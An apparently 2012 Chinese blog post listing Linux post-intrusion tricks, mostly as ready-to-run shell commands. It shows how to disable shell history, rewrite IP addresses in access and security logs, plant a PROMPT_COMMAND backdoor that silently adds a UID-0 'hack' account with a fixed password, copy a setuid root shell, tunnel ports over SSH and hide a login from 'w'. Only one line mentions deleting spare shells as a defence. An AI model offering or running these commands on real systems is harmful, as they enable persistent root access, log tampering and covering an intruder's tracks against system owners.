linux的入门渗透——几个常用参数的配置

2012年3月27日 发表评论 阅读评论

1. 登录ssh之后不记录history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0

DDrk中就用到了一面的一条:
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

 

2. sed增加登陆信息
替换登录日志
sed -s 's/202.101.172.35/192.168.1.1/g' access_log access.log security
添加ssh限制登录的用户
sed -i 's/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g' sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof -i:22 查找sshd的进程ID
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)
sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
然后
kill -SIGHUP 18662

 

3.linux的BASH提权
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hack:123456
/usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

 

4.ssh tunnel端口转发
ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f

 

5.本地rootshell
bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown
root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低级,但某些时候还是很
有用的。所以一般情况下把多余的shell删除可以在一定程度上 减少黑客的入侵。

6.让w查不到登录信息
用rootkit我就不废话了,这里有个小窍门,即使是普通用户登录管理员也不能看见:
ssh -T user@202.101.172.35 /bin/bash -i
ssh -T 202.101.172.35 -p 8088 -l root /bin/bash -i
这里也不便设置别人的IP,就搞个浙江电信的DNS地址吧。
该命令其实是把远程的bash映射到本地。在ps命令里还是能看到下面的进程的
_ sshd: root@notty
 _ /bin/bash -i




本站的发展离不开您的资助,金额随意,欢迎来赏!

You can donate through PayPal.
My paypal id: itybku@139.com
Paypal page: https://www.paypal.me/361way

分类: Linux/unix/mac 标签:
  1. 本文目前尚无任何评论.